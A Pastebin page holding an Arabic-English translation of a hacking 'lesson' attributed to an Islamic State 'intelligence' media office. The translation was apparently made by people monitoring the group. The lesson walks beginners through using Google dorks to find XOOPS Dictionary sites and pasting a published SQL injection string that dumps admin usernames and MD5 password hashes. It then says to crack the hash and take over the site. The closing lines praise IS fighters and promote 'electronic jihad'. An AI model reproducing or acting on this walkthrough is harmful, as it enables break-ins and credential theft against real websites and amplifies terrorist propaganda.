API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Nov 22nd, 2015
490
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.74 KB | None | 0 0
raw download clone embed print report
  1. Translation of: https://justpaste.it/Haker9
  2.  
  3. --- Arabic ---
  4. بسم الله الرحمن الرحيم
  5. درس اليوم تحت رعاية
  6. المكتب الإعلامي للمخابرات الإسلامية
  7. -
  8. فريق نخبة الدولة الاسلامية
  9.  
  10. درس اليوم مميز جدا بأذن الله
  11.  
  12. --- English ---
  13. Today's lesson sponsored by media office of the islamic state intelligence service - elite team of the islamic state
  14.  
  15. --- Arabic ---
  16. نروح الى احد مواقع الثغرات الكثيره
  17. وانا اخترت الميل ورم لانه اسهل واحد
  18. نفتح الصفحة الرئيسيه للموقع
  19. هدا الموقع يعرض ملايين المواقع المصابة بالثغرات
  20.  
  21. --- English ---
  22. We go to one of the many vulnerabilities websites and i chosen milworm because it is the easiest one.
  23. We open the main page of the website, this website exposes millions of sites infected with vulnerabilities.
  24.  
  25. --- Arabic ---
  26. www.exploit-db.com
  27. الي يهمنا في هذي الصفحة هو اختراق المواقع بما انك مبتدئ
  28. الثغرات الي لونهم اصفر هذول اليوم
  29. والي لونهم اخضر يعني اقدم
  30. وطبعا التاريخ مكتوب على جنب
  31. انا بختار وحدة من الثغرات الموجوده
  32. و اخترت هذي الثغره
  33.  
  34. --- English ---
  35. www.exploit-db.com
  36. What is important for us in this page is breaching sites.
  37. Since you are a beginner the vulnerabilities in yellow are for today
  38. and the ones in green mean they are older and of course the date is displayed on the side
  39. I chose one of the available vulnerabities and i chosen this one:
  40.  
  41. --- Arabic ---
  42. XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerability
  43. مكتوب فيها كـ التالي
  44. كود:
  45.  
  46. ##########################################
  47. #
  48. # XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
  49. #
  50. ##########################################
  51. #
  52. ##AUTHOR : S@BUN
  53. #
  54. ####HOME : milw0rm - S@BUN
  55. #
  56. ####MAİL : hackturkiye.hackturkiye@gmail.com
  57. #
  58. ###########################################
  59. #
  60. # DORK 1 : allinurl: "modules/dictionary"
  61. #
  62. # DORK 2 : allinurl: "modules/dictionary/print.php?id"
  63. #
  64. ###########################################
  65. EXPLOIT :
  66. modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
  67. ###########################################
  68. Dictionary Version 0.94 by nagl.ch
  69. Dictionary Version 0.91 by nagl.ch
  70. Dictionary Version 0.70 by nagl.ch
  71. ###########################################
  72. ##################S@BUN####################
  73. ###########################################
  74. #####hackturkiye.hackturkiye@gmail.com#####
  75. ###########################################
  76.  
  77. --- English ---
  78. XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerability
  79. Written inside as follows the code:
  80.  
  81. ##########################################
  82. #
  83. # XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
  84. #
  85. ##########################################
  86. #
  87. ##AUTHOR : S@BUN
  88. #
  89. ####HOME : milw0rm - S@BUN
  90. #
  91. ####MAİL : hackturkiye.hackturkiye@gmail.com
  92. #
  93. ###########################################
  94. #
  95. # DORK 1 : allinurl: "modules/dictionary"
  96. #
  97. # DORK 2 : allinurl: "modules/dictionary/print.php?id"
  98. #
  99. ###########################################
  100. EXPLOIT :
  101. modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
  102. ###########################################
  103. Dictionary Version 0.94 by nagl.ch
  104. Dictionary Version 0.91 by nagl.ch
  105. Dictionary Version 0.70 by nagl.ch
  106. ###########################################
  107. ##################S@BUN####################
  108. ###########################################
  109. #####hackturkiye.hackturkiye@gmail.com#####
  110. ###########################################
  111.  
  112. --- Arabic ---
  113. طيب نشرح شوي شوي
  114. الجزاء الاول
  115.  
  116. كود:
  117. XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
  118.  
  119. هذي معلومات عن الثغره
  120. نوعيتها و وين الثغره موجوده و في اي اصدار
  121. طيب
  122. الثغره هذي في سكريبت اسمه XOOPS
  123. وهذي مجله طبعا
  124. على اية حال الثغره في dictionary
  125. الا هو الدليل
  126. والاصدارات هي
  127. 0.94-0.91-0.70
  128. والبيانات الي بتجي هذي غير مهمه بـ النسبه لنا
  129. وهي معلومات عن مكتشف الثغره
  130. كود:
  131.  
  132. #
  133. ##AUTHOR : S@BUN
  134. #
  135. ####HOME : milw0rm - S@BUN
  136. #
  137. ####MAİL : hackturkiye.hackturkiye@gmail.com
  138. #
  139. ###########################################
  140.  
  141. --- English ---
  142. Alright we explain slowly the first part
  143.  
  144. Code:
  145. XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
  146.  
  147. This information about the vulnerability tells about its type and where it is in which version.
  148. This vulnerability is within the script called XOOPS and this is a dictionnary (of course "dictionnary") and it is a guide and the publication is 0.94-0.91-0.70 and the data that follows is not important for us it is about the one who discovered the vulnerability, code:
  149.  
  150. #
  151. ##AUTHOR : S@BUN
  152. #
  153. ####HOME : milw0rm - S@BUN
  154. #
  155. ####MAİL : hackturkiye.hackturkiye@gmail.com
  156. #
  157. ###########################################
  158.  
  159. --- Arabic ---
  160. والان اهم جزئين
  161. الجزاء الاول الدورك
  162.  
  163. ###########################################
  164. كود:
  165.  
  166. #
  167. # DORK 1 : allinurl: "modules/dictionary"
  168. #
  169. # DORK 2 : allinurl: "modules/dictionary/print.php?id"
  170. #
  171.  
  172. طبعا شرحت لكم الدورك في شرح سابق
  173. الدورك مجموعة من الاكواد تضع في محرك البحث وتجيب لك مواقع مصابة ..
  174. كود:
  175.  
  176. allinurl: "modules/dictionary"
  177.  
  178. راح يطلع لك كل المواقع الي موجود فيها
  179. الثغرة
  180. نختار المواقع وونفز
  181.  
  182. كود:
  183. Southwestern Pennsylvania League of Apparition Technologists - Dictionary
  184.  
  185. --- English ---
  186. And now the most important two sections
  187. The first section DORK
  188. Code:
  189. ###########################################
  190.  
  191. #
  192. # DORK 1 : allinurl: "modules/dictionary"
  193. #
  194. # DORK 2 : allinurl: "modules/dictionary/print.php?id"
  195. #
  196. Of course i explained to you DORK in a previous explanation
  197. DORK is a group of scripts put in a search engine and will return a result of infected websites
  198.  
  199. كود:
  200. allinurl: "modules/dictionary"
  201.  
  202. You will get all available websites that have this vulnerability we chose and jump to
  203. Code:
  204. Southwestern Pennsylvania League of Apparition Technologists - Dictionary
  205.  
  206. --- Arabic ---
  207. نروح الى الجزاء الثاني المهم
  208. الا وهو
  209.  
  210. كود:
  211.  
  212. ###########################################
  213. EXPLOIT :
  214.  
  215. modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
  216. ###########################################
  217. وهذا كود الإستغلال
  218. يعني راح ننسخ هذا الكود ونحطه في الموقع الي اخترناه
  219. وراح يصير رابط الموقع مع الاستغلال كذا
  220. كود:
  221.  
  222. Southwestern Pennsylvania League of Apparition Technologists
  223.  
  224. --- English ---
  225. We go to second important section which is
  226. code:
  227. ###########################################
  228. EXPLOIT :
  229.  
  230. modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
  231. ###########################################
  232. And this is the code of the exploitation meaning we will copy this code and put it in the site that we have chosen and the url of the site with the exploitation like this
  233. Code:
  234. Southwestern Pennsylvania League of Apparition Technologists (Note from #opisis: i think the title is copied here and not the url)
  235.  
  236. --- Arabic ---
  237. /*
  238. فورا راح يطلع لنا اليوزر والباسوورد لمدير الموقع
  239. طبعا الموضوع ما ينتهي هنا
  240. الباسوورد مشفر بـ الـ MD5
  241. والـ MD5 هذا نوع من انوع التشفير وهو نوعا ما
  242. لكن البرامج ما قصرت و تقدرو بـ اي برنامج فك باسووردات MD5 انكم تفكو الهاش الي يطلع لكم
  243. على اية حال الان الباسوورد طلع لنا مشفر مع الاسم
  244. يعني الباسوورد مشفر والاسم موجود جنبه
  245. وهم كذا
  246. ARC-753 : a19010808cc277ac5cc50548d7a61e8e
  247. الي بـالون الاحمر هذا الباسوورد المشفر
  248. والي بـ الازرق هذا اسم مدير الموقع الي راح تدخل به لوحة التحكم بعد ما تفك التشفير
  249. النقطتين الرئسيتين فقط لتفريق بينهم
  250. بعد ما تفك باسوورد الموقع
  251. تدخل لوحة تحكم الموقع وتسوي الي يعجبك
  252.  
  253. --- English ---
  254. Straight we will get the username and password of the admin of the site.
  255. Of course the story doesn't end here.
  256. The password is encoded with MD5, MD5 is a kind of encoding
  257. You will find plenty of programs that can decypher MD5 hashed passwords.
  258. Anyways we got the hashed password and name next to it like this:
  259. ARC-753 : a19010808cc277ac5cc50548d7a61e8e
  260. in red is the hashed password and in bleu the name of the admin of the site, that you will use to access the administration panel of the site after you decypher the password and do whatever you want with the site.
  261.  
  262.  
  263. --- Arabic ---
  264. هكذا تكون انتهت حلقتنا لهذا اليوم علي امل القاء بكم في شرح اخر باذن الله
  265. مع تحياتي اخوكم هاكر الخلافة - أبو حذيفة السيناوي
  266. لا اطلب الا النشر وعدم انتزاع حقوق الشرح ..
  267.  
  268. --- English ---
  269. This way we end our session for today in the hope to meet you again for another explanation blablabla
  270. Salutations your brother Abou (Abu) Houzayfah (Hazifah) Alsinawi (Al Sinawi)
  271.  
  272. --- Arabic ---
  273. انتظرو مني الدرس العاشر في القريب العاجل باذن الله
  274. في الختام اريد ان اشكر كل مجاهدين الدولة الاسلامية بكل مكان
  275. الذين يسهرون اليل لينكثو في الكفار والمرتدين
  276. ويطبقو شرع الله في ارضة المباركة ..
  277.  
  278. --- English ---
  279. Stay tuned for the 10th lesson soon...blablabla
  280.  
  281.  
  282. (Note: below is taken from another paste for reference)
  283. --- Arabic ---
  284. اذا واجتكم اي مشاكل راسلوني علي الحساب بتويتر
  285.  
  286. @abohhz_14
  287. او تلجرام
  288. @abohhz1
  289.  
  290. #الجهاد_الالكتروني
  291.  
  292. #هاكر_خلافة
  293.  
  294. --- English ---
  295. If you face any problem you can message me on
  296.  
  297. twitter: @abohhz_14
  298.  
  299. telegram: @abohhz1
  300.  
  301. #الجهاد_الالكتروني ( #electronic_jihad)
  302.  
  303. #هاكر_خلافة (#khilafah_hacker)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!